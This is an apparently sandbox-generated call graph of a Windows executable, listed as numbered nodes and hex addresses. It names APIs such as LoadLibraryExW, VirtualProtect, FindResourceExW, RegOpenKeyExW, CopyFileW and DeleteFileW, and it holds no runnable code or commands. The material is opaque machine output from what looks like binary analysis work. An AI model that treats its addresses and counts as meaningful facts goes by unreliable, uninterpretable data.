97911->98309 97914 e69997 84 API calls 97912->97914 97915 eccc75 97914->97915 97916 eccd76 97915->97916 97917 eccc97 97915->97917 97922 eccda6 Mailbox 97915->97922 98122 e64f3d 97916->98122 97918 e69997 84 API calls 97917->97918 97920 eccca3 97918->97920 97923 e681a7 59 API calls 97920->97923 97922->97868 97926 ecccaf 97923->97926 97924 eccda2 97924->97922 97925 e677c7 59 API calls 97924->97925 97928 eccdd7 97925->97928 97931 ecccf5 97926->97931 97932 ecccc3 97926->97932 97927 e64f3d 136 API calls 97927->97924 97929 e677c7 59 API calls 97928->97929 97930 eccde0 97929->97930 97934 e677c7 59 API calls 97930->97934 97933 e69997 84 API calls 97931->97933 97935 e681a7 59 API calls 97932->97935 97936 eccd02 97933->97936 97937 eccde9 97934->97937 97938 ecccd3 97935->97938 97940 e681a7 59 API calls 97936->97940 97941 e677c7 59 API calls 97937->97941 97939 e67e0b 59 API calls 97938->97939 97942 ecccdd 97939->97942 97943 eccd0e 97940->97943 97944 eccdf2 97941->97944 97945 e69997 84 API calls 97942->97945 98310 ec4ad8 GetFileAttributesW 97943->98310 97947 e69997 84 API calls 97944->97947 97948 eccce9 97945->97948 97950 eccdff 97947->97950 97951 e67c8e 59 API calls 97948->97951 97949 eccd17 97952 eccd2a 97949->97952 97955 e67b52 59 API calls 97949->97955 98146 e646f9 97950->98146 97951->97931 97954 e69997 84 API calls 97952->97954 97962 eccd30 97952->97962 97958 eccd57 97954->97958 97955->97952 97956 ecce1a 98197 e67b52 97956->98197 98311 ec3833 75 API calls Mailbox 97958->98311 97961 ecce5d 97964 e681a7 59 API calls 97961->97964 97962->97922 97963 e67b52 59 API calls 97965 ecce3a 97963->97965 97966 ecce6b 97964->97966 97965->97961 97968 e67d2c 59 API calls 97965->97968 97967 e67c8e 59 API calls 97966->97967 97969 ecce79 97967->97969 97970 ecce4f 97968->97970 97971 e67c8e 59 API calls 97969->97971 97972 e67d2c 59 API calls 97970->97972 97973 ecce87 97971->97973 97972->97961 97974 e67c8e 59 API calls 97973->97974 97975 ecce95 97974->97975 97976 e69997 84 API calls 97975->97976 97977 eccea1 97976->97977 98200 ec40b2 97977->98200 97979 ecceb2 97980 ec3c7b 3 API calls 97979->97980 97981 eccebc 97980->97981 97982 e69997 84 API calls 97981->97982 97986 ecceed 97981->97986 97983 ecceda 97982->97983 98254 ec91fe 97983->98254 98312 e64faa 97986->98312 98841 ec449b GetFileAttributesW 97987->98841 97991 edcbf1 130 API calls 97990->97991 97992 ede05b 97991->97992 97992->97868 97993->97864 97994->97868 97995->97862 97996->97866 97998 e69997 84 API calls 97997->97998 97999 edcc2e 97998->97999 98018 edcc75 Mailbox 97999->98018 98035 edd8b9 97999->98035 98001 edcecd 98002 edd042 98001->98002 98006 edcedb 98001->98006 98085 edd9dc 92 API calls Mailbox 98002->98085 98005 edd051 98005->98006 98008 edd05d 98005->98008 98048 edca82 98006->98048 98007 e69997 84 API calls 98026 edccc6 Mailbox 98007->98026 98008->98018 98013 edcf14 98063 e80d88 98013->98063 98016 edcf2e 98069 ec9ed4 89 API calls 4 library calls 98016->98069 98017 edcf47 98070 e6942e 98017->98070 98018->97906 98021 edcf39 GetCurrentProcess TerminateProcess 98021->98017 98026->98001 98026->98007 98026->98018 98067 ecf656 59 API calls 2 library calls 98026->98067 98068 edd0f3 61 API calls 2 library calls 98026->98068 98027 edd0b8 98027->98018 98031 edd0cc FreeLibrary 98027->98031 98028 edcf7f 98082 edd75d 107 API calls _free 98028->98082 98031->98018 98034 edcf90 98034->98027 98083 e68ea0 59 API calls Mailbox 98034->98083 98084 e69e9c 60 API calls Mailbox 98034->98084 98086 edd75d 107 API calls _free 98034->98086 98036 e67faf 59 API calls 98035->98036 98037 edd8d4 CharLowerBuffW 98036->98037 98087 ebf479 98037->98087 98041 e677c7 59 API calls 98042 edd90d 98041->98042 98094 e679ab 98042->98094 98044 edd924 98045 e67e8c 59 API calls 98044->98045 98046 edd930 Mailbox 98045->98046 98047 edd96c Mailbox 98046->98047 98107 edd0f3 61 API calls 2 library calls 98046->98107 98047->98026 98049 edca9d 98048->98049 98050 edcaf2 98048->98050 98051 e80f36 Mailbox 59 API calls 98049->98051 98054 eddb64 98050->98054 98053 edcabf 98051->98053 98052 e80f36 Mailbox 59 API calls 98052->98053 98053->98050 98053->98052 98055 eddd8d Mailbox 98054->98055 98059 eddb87 _strcat _wcscpy __wsetenvp 98054->98059 98055->98013 98056 e69c9c 59 API calls 98056->98059 98057 e69d46 59 API calls 98057->98059 98058 e69cf8 59 API calls 98058->98059 98059->98055 98059->98056 98059->98057 98059->98058 98060 e8588c 58 API calls __malloc_crt 98059->98060 98061 e69997 84 API calls 98059->98061 98111 ec592e 61 API calls 2 library calls 98059->98111 98060->98059 98061->98059 98064 e80d9d 98063->98064 98065 e80e35 VirtualProtect 98064->98065 98066 e80e03 98064->98066 98065->98066 98066->98016 98066->98017 98067->98026 98068->98026 98069->98021 98071 e69436 98070->98071 98072 e80f36 Mailbox 59 API calls 98071->98072 98073 e69444 98072->98073 98074 e69450 98073->98074 98112 e6935c 59 API calls Mailbox 98073->98112 98076 e691b0 98074->98076 98113 e692c0 98076->98113 98078 e691bf 98079 e80f36 Mailbox 59 API calls 98078->98079 98080 e6925b 98078->98080 98079->98080 98080->98034 98081 e68ea0 59 API calls Mailbox 98080->98081 98081->98028 98082->98034 98083->98034 98084->98034 98085->98005 98086->98034 98088 ebf4a4 __wsetenvp 98087->98088 98089 ebf4e3 98088->98089 98091 ebf4d9 98088->98091 98093 ebf58a 98088->98093 98089->98041 98089->98046 98091->98089 98108 e67a24 61 API calls 98091->98108 98093->98089 98109 e67a24 61 API calls 98093->98109 98095 e67a17 98094->98095 98096 e679ba 98094->98096 98097 e67e8c 59 API calls 98095->98097 98096->98095 98098 e679c5 98096->98098 98099 e679e8 _memmove 98097->98099 98100 e679e0 98098->98100 98101 e9ee62 98098->98101 98099->98044 98110 e68087 59 API calls Mailbox 98100->98110 98102 e68189 59 API calls 98101->98102 98104 e9ee6c 98102->98104 98105 e80f36 Mailbox 59 API calls 98104->98105 98106 e9ee8c 98105->98106 98107->98047 98108->98091 98109->98093 98110->98099 98111->98059 98112->98074 98114 e692c9 Mailbox 98113->98114 98115 e9f4f8 98114->98115 98120 e692d3 98114->98120 98116 e80f36 Mailbox 59 API calls 98115->98116 98118 e9f504 98116->98118 98117 e692da 98117->98078 98120->98117 98121 e69df0 59 API calls Mailbox 98120->98121 98121->98120 98318 e64d13 98122->98318 98127 e9dc3f 98129 e64faa 84 API calls 98127->98129 98128 e64f68 LoadLibraryExW 98328 e64cc8 98128->98328 98132 e9dc46 98129->98132 98134 e64cc8 3 API calls 98132->98134 98136 e9dc4e 98134->98136 98135 e64f8f 98135->98136 98137 e64f9b 98135->98137 98354 e6506b 98136->98354 98138 e64faa 84 API calls 98137->98138 98140 e64fa0 98138->98140 98140->97924 98140->97927 98143 e9dc75 98360 e65027 98143->98360 98147 e677c7 59 API calls 98146->98147 98148 e6470f 98147->98148 98149 e677c7 59 API calls 98148->98149 98150 e64717 98149->98150 98151 e677c7 59 API calls 98150->98151 98152 e6471f 98151->98152 98153 e677c7 59 API calls 98152->98153 98154 e64727 98153->98154 98155 e9d82b 98154->98155 98156 e6475b 98154->98156 98157 e681a7 59 API calls 98155->98157 98158 e679ab 59 API calls 98156->98158 98159 e9d834 98157->98159 98160 e64769 98158->98160 98530 e67eec 98159->98530 98162 e67e8c 59 API calls 98160->98162 98163 e64773 98162->98163 98164 e6479e 98163->98164 98165 e679ab 59 API calls 98163->98165 98167 e647bd 98164->98167 98168 e9d854 98164->98168 98182 e647de 98164->98182 98169 e64794 98165->98169 98166 e679ab 59 API calls 98170 e647ef 98166->98170 98173 e67b52 59 API calls 98167->98173 98171 e9d924 98168->98171 98183 e9d90d 98168->98183 98191 e9d88b 98168->98191 98172 e67e8c 59 API calls 98169->98172 98174 e64801 98170->98174 98177 e681a7 59 API calls 98170->98177 98175 e67d2c 59 API calls 98171->98175 98172->98164 98176 e647c7 98173->98176 98179 e681a7 59 API calls 98174->98179 98180 e64811 98174->98180 98192 e9d8e1 98175->98192 98178 e679ab 59 API calls 98176->98178 98176->98182 98177->98174 98178->98182 98179->98180 98181 e64818 98180->98181 98184 e681a7 59 API calls 98180->98184 98185 e681a7 59 API calls 98181->98185 98194 e6481f Mailbox 98181->98194 98182->98166 98183->98171 98187 e9d8f8 98183->98187 98184->98181 98185->98194 98186 e67b52 59 API calls 98186->98192 98189 e67d2c 59 API calls 98187->98189 98188 e9d8e9 98190 e67d2c 59 API calls 98188->98190 98189->98192 98190->98192 98191->98188 98195 e9d8d4 98191->98195 98192->98182 98192->98186 98534 e67a84 59 API calls 2 library calls 98192->98534 98194->97956 98196 e67d2c 59 API calls 98195->98196 98196->98192 98198 e67faf 59 API calls 98197->98198 98199 e67b5d 98198->98199 98199->97961 98199->97963 98201 ec40ce 98200->98201 98202 ec40e1 98201->98202 98203 ec40d3 98201->98203 98205 e677c7 59 API calls 98202->98205 98204 e681a7 59 API calls 98203->98204 98206 ec40dc Mailbox 98204->98206 98207 ec40e9 98205->98207 98206->97979 98208 e677c7 59 API calls 98207->98208 98209 ec40f1 98208->98209 98210 e677c7 59 API calls 98209->98210 98211 ec40fc 98210->98211 98212 e677c7 59 API calls 98211->98212 98213 ec4104 98212->98213 98214 e677c7 59 API calls 98213->98214 98215 ec410c 98214->98215 98216 e677c7 59 API calls 98215->98216 98217 ec4114 98216->98217 98218 e677c7 59 API calls 98217->98218 98219 ec411c 98218->98219 98220 e677c7 59 API calls 98219->98220 98221 ec4124 98220->98221 98222 e646f9 59 API calls 98221->98222 98223 ec413b 98222->98223 98224 e646f9 59 API calls 98223->98224 98225 ec4154 98224->98225 98226 e67b52 59 API calls 98225->98226 98227 ec4160 98226->98227 98228 ec4173 98227->98228 98229 e67e8c 59 API calls 98227->98229 98230 e67b52 59 API calls 98228->98230 98229->98228 98231 ec417c 98230->98231 98232 ec418c 98231->98232 98234 e67e8c 59 API calls 98231->98234 98233 e681a7 59 API calls 98232->98233 98235 ec4198 98233->98235 98234->98232 98236 e67c8e 59 API calls 98235->98236 98237 ec41a4 98236->98237 98535 ec4264 59 API calls 98237->98535 98239 ec41b3 98536 ec4264 59 API calls 98239->98536 98241 ec41c6 98242 e67b52 59 API calls 98241->98242 98243 ec41d0 98242->98243 98244 ec41d5 98243->98244 98245 ec41e7 98243->98245 98246 e67e0b 59 API calls 98244->98246 98247 e67b52 59 API calls 98245->98247 98249 ec41e2 98246->98249 98248 ec41f0 98247->98248 98250 ec420e 98248->98250 98251 e67e0b 59 API calls 98248->98251 98252 e67c8e 59 API calls 98249->98252 98253 e67c8e 59 API calls 98250->98253 98251->98249 98252->98250 98253->98206 98255 ec920b __write_nolock 98254->98255 98256 e80f36 Mailbox 59 API calls 98255->98256 98257 ec9268 98256->98257 98258 e6538e 59 API calls 98257->98258 98259 ec9272 98258->98259 98537 ec9008 98259->98537 98261 ec927d 98262 e65045 85 API calls 98261->98262 98263 ec9290 _wcscmp 98262->98263 98264 ec92b4 98263->98264 98265 ec9361 98263->98265 98570 ec97dd 96 API calls 2 library calls 98264->98570 98573 ec97dd 96 API calls 2 library calls 98265->98573 98268 ec92b9 98271 ec936a 98268->98271 98571 e8426e 58 API calls __wsplitpath_helper 98268->98571 98270 e6506b 74 API calls 98272 ec9386 98270->98272 98271->97986 98273 e6506b 74 API calls 98272->98273 98275 ec9396 98273->98275 98274 ec92e2 _wcscat _wcscpy 98572 e8426e 58 API calls __wsplitpath_helper 98274->98572 98276 e6506b 74 API calls 98275->98276 98278 ec93b1 98276->98278 98279 e6506b 74 API calls 98278->98279 98280 ec93c1 98279->98280 98281 e6506b 74 API calls 98280->98281 98283 ec93dc 98281->98283 98282 ec932d _wcscat 98282->98270 98282->98271 98284 e6506b 74 API calls 98283->98284 98285 ec93ec 98284->98285 98286 e6506b 74 API calls 98285->98286 98287 ec93fc 98286->98287 98288 e6506b 74 API calls 98287->98288 98289 ec940c 98288->98289 98540 ec998c GetTempPathW GetTempFileNameW 98289->98540 98291 ec9418 98292 e853cb 115 API calls 98291->98292 98294 ec9429 98292->98294 98294->98271 98296 e6506b 74 API calls 98294->98296 98307 ec94e3 98294->98307 98541 e849d3 98294->98541 98295 ec94ee 98297 ec9508 98295->98297 98298 ec94f4 DeleteFileW 98295->98298 98296->98294 98299 ec95ae CopyFileW 98297->98299 98303 ec9512 _wcsncpy 98297->98303 98298->98271 98300 ec95c4 DeleteFileW 98299->98300 98301 ec95d6 DeleteFileW 98299->98301 98300->98271 98567 ec994b CreateFileW 98301->98567 98574 ec8baf 116 API calls __fcloseall 98303->98574 98306 ec9599 98306->98301 98308 ec959d DeleteFileW 98306->98308 98554 e85516 98307->98554 98308->98271 98309->97912 98310->97949 98311->97962 98313 e64fb4 98312->98313 98314 e64fbb 98312->98314 98315 e85516 __fcloseall 83 API calls 98313->98315 98316 e64fca 98314->98316 98317 e64fdb FreeLibrary 98314->98317 98315->98314 98316->97922 98317->98316 98365 e64d61 98318->98365 98321 e64d53 98325 e853cb 98321->98325 98322 e64d4a FreeLibrary 98322->98321 98323 e64d61 2 API calls 98324 e64d3a 98323->98324 98324->98321 98324->98322 98369 e853e0 98325->98369 98327 e64f5c 98327->98127 98327->98128 98450 e64d94 98328->98450 98331 e64ced 98333 e64cff FreeLibrary 98331->98333 98334 e64d08 98331->98334 98332 e64d94 2 API calls 98332->98331 98333->98334 98335 e64dd0 98334->98335 98336 e80f36 Mailbox 59 API calls 98335->98336 98337 e64de5 98336->98337 98454 e6538e 98337->98454 98339 e64df1 _memmove 98340 e64e2c 98339->98340 98341 e64f21 98339->98341 98342 e64ee9 98339->98342 98343 e65027 69 API calls 98340->98343 98468 ec99c4 95 API calls 98341->98468 98457 e64fe9 CreateStreamOnHGlobal 98342->98457 98347 e64e35 98343->98347 98346 e6506b 74 API calls 98346->98347 98347->98346 98348 e64ec9 98347->98348 98350 e9dc00 98347->98350 98463 e65045 98347->98463 98348->98135 98351 e65045 85 API calls 98350->98351 98352 e9dc14 98351->98352 98353 e6506b 74 API calls 98352->98353 98353->98348 98355 e6507d 98354->98355 98356 e9dd26 98354->98356 98492 e85752 98355->98492 98359 ec91b2 GetSystemTimeAsFileTime 98359->98143 98361 e9dce9 98360->98361 98362 e65036 98360->98362 98512 e85dd0 98362->98512 98364 e6503e 98366 e64d2e 98365->98366 98367 e64d6a LoadLibraryA 98365->98367 98366->98323 98366->98324 98367->98366 98368 e64d7b GetProcAddress 98367->98368 98368->98366 98372 e853ec _doexit 98369->98372 98370 e853ff 98418 e88ca8 58 API calls __getptd_noexit 98370->98418 98372->98370 98374 e85430 98372->98374 98373 e85404 98419 e88f36 9 API calls __wcsnicmp 98373->98419 98388 e90668 98374->98388 98377 e85435 98378 e8544b 98377->98378 98379 e8543e 98377->98379 98381 e85475 98378->98381 98382 e85455 98378->98382 98420 e88ca8 58 API calls __getptd_noexit 98379->98420 98403 e90787 98381->98403 98421 e88ca8 58 API calls __getptd_noexit 98382->98421 98385 e8540f _doexit @_EH4_CallFilterFunc@8 98385->98327 98389 e90674 _doexit 98388->98389 98390 e89d8b __lock 58 API calls 98389->98390 98391 e90682 98390->98391 98392 e906fd 98391->98392 98397 e89e13 __mtinitlocknum 58 API calls 98391->98397 98401 e906f6 98391->98401 98426 e86dcd 59 API calls __lock 98391->98426 98427 e86e37 LeaveCriticalSection LeaveCriticalSection _doexit 98391->98427 98428 e8899d 58 API calls __malloc_crt 98392->98428 98395 e90773 _doexit 98395->98377 98396 e90704 98396->98401 98429 e89fab InitializeCriticalSectionAndSpinCount 98396->98429 98397->98391 98400 e9072a EnterCriticalSection 98400->98401 98423 e9077e 98401->98423 98411 e907a7 __wopenfile 98403->98411 98404 e907c1 98434 e88ca8 58 API calls __getptd_noexit 98404->98434 98406 e907c6 98435 e88f36 9 API calls __wcsnicmp 98406->98435 98407 e9097c 98407->98404 98410 e909df 98407->98410 98409 e85480 98422 e854a2 LeaveCriticalSection LeaveCriticalSection __wfsopen 98409->98422 98431 e98721 98410->98431 98411->98404 98411->98407 98436 e8394b 60 API calls 2 library calls 98411->98436 98414 e90975 98414->98407 98437 e8394b 60 API calls 2 library calls 98414->98437 98416 e90994 98416->98407 98438 e8394b 60 API calls 2 library calls 98416->98438 98418->98373 98419->98385 98420->98385 98421->98385 98422->98385 98430 e89ef5 LeaveCriticalSection 98423->98430 98425 e90785 98425->98395 98426->98391 98427->98391 98428->98396 98429->98400 98430->98425 98439 e97f05 98431->98439 98433 e9873a 98433->98409 98434->98406 98435->98409 98436->98414 98437->98416 98438->98407 98440 e97f11 _doexit 98439->98440 98441 e97f27 98440->98441 98443 e97f5d 98440->98443 98442 e88ca8 __wcsnicmp 58 API calls 98441->98442 98444 e97f2c 98442->98444 98445 e97fce __wsopen_nolock 109 API calls 98443->98445 98446 e88f36 __wcsnicmp 9 API calls 98444->98446 98447 e97f79 98445->98447 98449 e97f36 _doexit 98446->98449 98448 e97fa2 __wsopen_helper LeaveCriticalSection 98447->98448 98448->98449 98449->98433 98451 e64ce1 98450->98451 98452 e64d9d LoadLibraryA 98450->98452 98451->98331 98451->98332 98452->98451 98453 e64dae GetProcAddress 98452->98453 98453->98451 98455 e80f36 Mailbox 59 API calls 98454->98455 98456 e653a0 98455->98456 98456->98339 98458 e65003 FindResourceExW 98457->98458 98462 e65020 98457->98462 98459 e9dc8c LoadResource 98458->98459 98458->98462 98460 e9dca1 SizeofResource 98459->98460 98459->98462 98461 e9dcb5 LockResource 98460->98461 98460->98462 98461->98462 98462->98340 98464 e65054 98463->98464 98465 e9dd04 98463->98465 98469 e859bd 98464->98469 98467 e65062 98467->98347 98468->98340 98473 e859c9 _doexit 98469->98473 98470 e859db 98482 e88ca8 58 API calls __getptd_noexit 98470->98482 98472 e85a01 98484 e86d8e 98472->98484 98473->98470 98473->98472 98475 e859e0 98483 e88f36 9 API calls __wcsnicmp 98475->98483 98479 e85a16 98491 e85a38 LeaveCriticalSection LeaveCriticalSection __wfsopen 98479->98491 98480 e859eb _doexit 98480->98467 98482->98475 98483->98480 98485 e86d9e 98484->98485 98486 e86dc0 EnterCriticalSection 98484->98486 98485->98486 98488 e86da6 98485->98488 98487 e85a07 98486->98487 98490 e8592e 83 API calls 5 library calls 98487->98490 98489 e89d8b __lock 58 API calls 98488->98489 98489->98487 98490->98479 98491->98480 98495 e8576d 98492->98495 98494 e6508e 98494->98359 98496 e85779 _doexit 98495->98496 98497 e857bc 98496->98497 98498 e8578f _memset 98496->98498 98499 e857b4 _doexit 98496->98499 98500 e86d8e __lock_file 59 API calls 98497->98500 98508 e88ca8 58 API calls __getptd_noexit 98498->98508 98499->98494 98501 e857c2 98500->98501 98510 e8558d 72 API calls 6 library calls 98501->98510 98504 e857a9 98509 e88f36 9 API calls __wcsnicmp 98504->98509 98505 e857d8 98511 e857f6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98505->98511 98508->98504 98509->98499 98510->98505 98511->98499 98513 e85ddc _doexit 98512->98513 98514 e85dee 98513->98514 98515 e85e03 98513->98515 98526 e88ca8 58 API calls __getptd_noexit 98514->98526 98516 e86d8e __lock_file 59 API calls 98515->98516 98518 e85e09 98516->98518 98528 e85a40 67 API calls 6 library calls 98518->98528 98519 e85df3 98527 e88f36 9 API calls __wcsnicmp 98519->98527 98522 e85e14 98529 e85e34 LeaveCriticalSection LeaveCriticalSection __wfsopen 98522->98529 98524 e85e26 98525 e85dfe _doexit 98524->98525 98525->98364 98526->98519 98527->98525 98528->98522 98529->98524 98531 e67f06 98530->98531 98533 e67ef9 98530->98533 98532 e80f36 Mailbox 59 API calls 98531->98532 98532->98533 98533->98164 98534->98192 98535->98239 98536->98241 98575 e8537a GetSystemTimeAsFileTime 98537->98575 98539 ec9017 98539->98261 98540->98291 98542 e849df _doexit 98541->98542 98543 e849fd 98542->98543 98544 e84a15 98542->98544 98545 e84a0d _doexit 98542->98545 98589 e88ca8 58 API calls __getptd_noexit 98543->98589 98546 e86d8e __lock_file 59 API calls 98544->98546 98545->98294 98548 e84a1b 98546->98548 98577 e8487a 98548->98577 98549 e84a02 98590 e88f36 9 API calls __wcsnicmp 98549->98590 98555 e85522 _doexit 98554->98555 98556 e8554e 98555->98556 98557 e85536 98555->98557 98559 e86d8e __lock_file 59 API calls 98556->98559 98563 e85546 _doexit 98556->98563 98768 e88ca8 58 API calls __getptd_noexit 98557->98768 98562 e85560 98559->98562 98560 e8553b 98769 e88f36 9 API calls __wcsnicmp 98560->98769 98752 e854aa 98562->98752 98563->98295 98568 ec9987 98567->98568 98569 ec9971 SetFileTime CloseHandle 98567->98569 98568->98271 98569->98568 98570->98268 98571->98274 98572->98282 98573->98282 98574->98306 98576 e853a8 __aulldiv 98575->98576 98576->98539 98579 e84889 98577->98579 98585 e848a7 98577->98585 98578 e84897 98627 e88ca8 58 API calls __getptd_noexit 98578->98627 98579->98578 98581 e848c1 _memmove 98579->98581 98579->98585 98581->98585 98592 e84856 98581->98592 98599 e8da06 98581->98599 98629 e84bad 98581->98629 98635 e8af9e 78 API calls 7 library calls 98581->98635 98582 e8489c 98628 e88f36 9 API calls __wcsnicmp 98582->98628 98591 e84a4d LeaveCriticalSection LeaveCriticalSection __wfsopen 98585->98591 98589->98549 98590->98545 98591->98545 98593 e84860 98592->98593 98594 e84875 98592->98594 98636 e88ca8 58 API calls __getptd_noexit 98593->98636 98594->98581 98596 e84865 98637 e88f36 9 API calls __wcsnicmp 98596->98637 98598 e84870 98598->98581 98600 e8da12 _doexit 98599->98600 98601 e8da1f 98600->98601 98602 e8da36 98600->98602 98711 e88c74 58 API calls __getptd_noexit 98601->98711 98604 e8dad5 98602->98604 98606 e8da4a 98602->98606 98717 e88c74 58 API calls __getptd_noexit 98604->98717 98605 e8da24 98712 e88ca8 58 API calls __getptd_noexit 98605->98712 98609 e8da68 98606->98609 98610 e8da72 98606->98610 98713 e88c74 58 API calls __getptd_noexit 98609->98713 98638 e8d386 98610->98638 98611 e8da6d 98718 e88ca8 58 API calls __getptd_noexit 98611->98718 98614 e8da78 98616 e8da8b 98614->98616 98617 e8da9e 98614->98617 98647 e8daf5 98616->98647 98714 e88ca8 58 API calls __getptd_noexit 98617->98714 98618 e8dae1 98719 e88f36 9 API calls __wcsnicmp 98618->98719 98619 e8da2b _doexit 98619->98581 98623 e8da97 98716 e8dacd LeaveCriticalSection __unlock_fhandle 98623->98716 98624 e8daa3 98715 e88c74 58 API calls __getptd_noexit 98624->98715 98627->98582 98628->98585 98630 e84bc0 98629->98630 98631 e84be4 98629->98631 98630->98631 98632 e84856 __fclose_nolock 58 API calls 98630->98632 98631->98581 98633 e84bdd 98632->98633 98634 e8da06 __write 78 API calls 98633->98634 98634->98631 98635->98581 98636->98596 98637->98598 98639 e8d392 _doexit 98638->98639 98640 e8d3e1 EnterCriticalSection 98639->98640 98641 e89d8b __lock 58 API calls 98639->98641 98642 e8d407 _doexit 98640->98642 98643 e8d3b7 98641->98643 98642->98614 98644 e8d3cf 98643->98644 98720 e89fab InitializeCriticalSectionAndSpinCount 98643->98720 98721 e8d40b LeaveCriticalSection _doexit 98644->98721 98648 e8db02 __write_nolock 98647->98648 98649 e8db60 98648->98649 98650 e8db41 98648->98650 98672 e8db36 98648->98672 98655 e8dbb8 98649->98655 98656 e8db9c 98649->98656 98731 e88c74 58 API calls __getptd_noexit 98650->98731 98653 e8e356 98653->98623 98654 e8db46 98732 e88ca8 58 API calls __getptd_noexit 98654->98732 98658 e8dbd1 98655->98658 98737 e91a41 60 API calls 3 library calls 98655->98737 98734 e88c74 58 API calls __getptd_noexit 98656->98734 98722 e95deb 98658->98722 98663 e8dba1 98745 e8c776 98672->98745 98711->98605 98712->98619 98713->98611 98714->98624 98715->98623 98716->98619 98717->98611 98718->98618 98719->98619 98720->98644 98721->98640 98731->98654 98734->98663 98737->98658 98746 e8c77e 98745->98746 98747 e8c780 IsProcessorFeaturePresent 98745->98747 98746->98653 98749 e95a8a 98747->98749 98753 e854b9 98752->98753 98754 e854cd 98752->98754 98801 e88ca8 58 API calls __getptd_noexit 98753->98801 98756 e854c9 98754->98756 98758 e84bad __flush 78 API calls 98754->98758 98770 e85585 LeaveCriticalSection LeaveCriticalSection __wfsopen 98756->98770 98757 e854be 98802 e88f36 9 API calls __wcsnicmp 98757->98802 98760 e854d9 98758->98760 98771 e90cf7 98760->98771 98763 e84856 __fclose_nolock 58 API calls 98764 e854e7 98763->98764 98775 e90b82 98764->98775 98766 e854ed 98766->98756 98767 e82ed5 _free 58 API calls 98766->98767 98767->98756 98768->98560 98769->98563 98770->98563 98772 e854e1 98771->98772 98773 e90d04 98771->98773 98772->98763 98773->98772 98774 e82ed5 _free 58 API calls 98773->98774 98774->98772 98776 e90b8e _doexit 98775->98776 98777 e90b9b 98776->98777 98778 e90bb2 98776->98778 98818 e88c74 58 API calls __getptd_noexit 98777->98818 98780 e90c3d 98778->98780 98782 e90bc2 98778->98782 98823 e88c74 58 API calls __getptd_noexit 98780->98823 98781 e90ba0 98819 e88ca8 58 API calls __getptd_noexit 98781->98819 98785 e90bea 98782->98785 98786 e90be0 98782->98786 98788 e8d386 ___lock_fhandle 59 API calls 98785->98788 98820 e88c74 58 API calls __getptd_noexit 98786->98820 98791 e90bf0 98788->98791 98789 e90be5 98824 e88ca8 58 API calls __getptd_noexit 98789->98824 98793 e90c0e 98791->98793 98794 e90c03 98791->98794 98792 e90c49 98825 e88f36 9 API calls __wcsnicmp 98792->98825 98821 e88ca8 58 API calls __getptd_noexit 98793->98821 98803 e90c5d 98794->98803 98797 e90ba7 _doexit 98797->98766 98799 e90c09 98822 e90c35 LeaveCriticalSection __unlock_fhandle 98799->98822 98801->98757 98802->98756 98826 e8d643 98803->98826 98818->98781 98819->98797 98820->98789 98821->98799 98822->98797 98823->98789 98824->98792 98825->98797 98827 e8d64e 98826->98827 98828 e8d663 98826->98828 98842 ec3c82 98841->98842 98843 ec44b6 FindFirstFileW 98841->98843 98842->97868 98843->98842 98844 ec44cb FindClose 98843->98844 98844->98842 98845->97808 98846 e6107d 98851 e671eb 98846->98851 98848 e6108c 98849 e82ec0 __cinit 67 API calls 98848->98849 98850 e61096 98849->98850 98852 e671fb __write_nolock 98851->98852 98853 e677c7 59 API calls 98852->98853 98854 e672b1 98853->98854 98882 e64864 98854->98882 98856 e672ba 98889 e8068b 98856->98889 98859 e67e0b 59 API calls 98860 e672d3 98859->98860 98895 e63f84 98860->98895 98863 e677c7 59 API calls 98864 e672eb 98863->98864 98865 e67eec 59 API calls 98864->98865 98866 e672f4 RegOpenKeyExW 98865->98866 98867 e9ec0a RegQueryValueExW 98866->98867 98872 e67316 Mailbox 98866->98872 98868 e9ec9c RegCloseKey 98867->98868 98869 e9ec27 98867->98869 98870 e9ecae _wcscat Mailbox __wsetenvp 98868->98870 98868->98872 98871 e80f36 Mailbox 59 API calls 98869->98871 98870->98872 98876 e67b52 59 API calls 98870->98876 98880 e67f41 59 API calls 98870->98880 98881 e63f84 59 API calls 98870->98881 98873 e9ec40 98871->98873 98872->98848 98874 e6538e 59 API calls 98873->98874 98875 e9ec4b RegQueryValueExW 98874->98875 98877 e9ec68 98875->98877 98879 e9ec82 98875->98879 98876->98870 98878 e67d2c 59 API calls 98877->98878 98878->98879 98879->98868 98880->98870 98881->98870 98901 e91ac0 98882->98901 98885 e67f41 59 API calls 98886 e64897 98885->98886 98903 e648ae 98886->98903 98888 e648a1 Mailbox 98888->98856 98890 e91ac0 __write_nolock 98889->98890 98891 e80698 GetFullPathNameW 98890->98891 98892 e806ba 98891->98892 98893 e67d2c 59 API calls 98892->98893 98894 e672c5 98893->98894 98894->98859 98896 e63f92 98895->98896 98900 e63fb4 _memmove 98895->98900 98898 e80f36 Mailbox 59 API calls 98896->98898 98897 e80f36 Mailbox 59 API calls 98899 e63fc8 98897->98899 98898->98900 98899->98863 98900->98897 98902 e64871 GetModuleFileNameW 98901->98902 98902->98885 98904 e91ac0 __write_nolock 98903->98904 98905 e648bb GetFullPathNameW 98904->98905 98906 e648f7 98905->98906 98907 e648da 98905->98907 98909 e67eec 59 API calls 98906->98909 98908 e67d2c 59 API calls 98907->98908 98910 e648e6 98908->98910 98909->98910 98911 e67886 59 API calls 98910->98911 98912 e648f2 98911->98912 98912->98888 98913 e87dd3 98914 e87ddf _doexit 98913->98914 98950 e89f88 GetStartupInfoW 98914->98950 98916 e87de4 98952 e88cfc GetProcessHeap 98916->98952 98918 e87e3c 98919 e87e47 98918->98919 99035 e87f23 58 API calls 3 library calls 98918->99035 98953 e89c66 98919->98953 98922 e87e4d 98923 e87e58 __RTC_Initialize 98922->98923 99036 e87f23 58 API calls 3 library calls 98922->99036 98974 e8d752 98923->98974 98926 e87e67 98927 e87e73 GetCommandLineW 98926->98927 99037 e87f23 58 API calls 3 library calls 98926->99037 98993 e950a3 GetEnvironmentStringsW 98927->98993 98931 e87e72 98931->98927 98933 e87e8d 98934 e87e98 98933->98934 99038 e83235 58 API calls 3 library calls 98933->99038 99003 e94ed8 98934->99003 98937 e87e9e 98938 e87ea9 98937->98938 99039 e83235 58 API calls 3 library calls 98937->99039 99017 e8326f 98938->99017 98941 e87eb1 98942 e87ebc __wwincmdln 98941->98942 99040 e83235 58 API calls 3 library calls 98941->99040 99023 e6492e 98942->99023 98945 e87ed0 98946 e87edf 98945->98946 99041 e834d8 58 API calls _doexit 98945->99041 99042 e83260 58 API calls _doexit 98946->99042 98949 e87ee4 _doexit 98951 e89f9e 98950->98951 98951->98916 98952->98918 99043 e83307 36 API calls 2 library calls 98953->99043 98955 e89c6b 99044 e89ebc 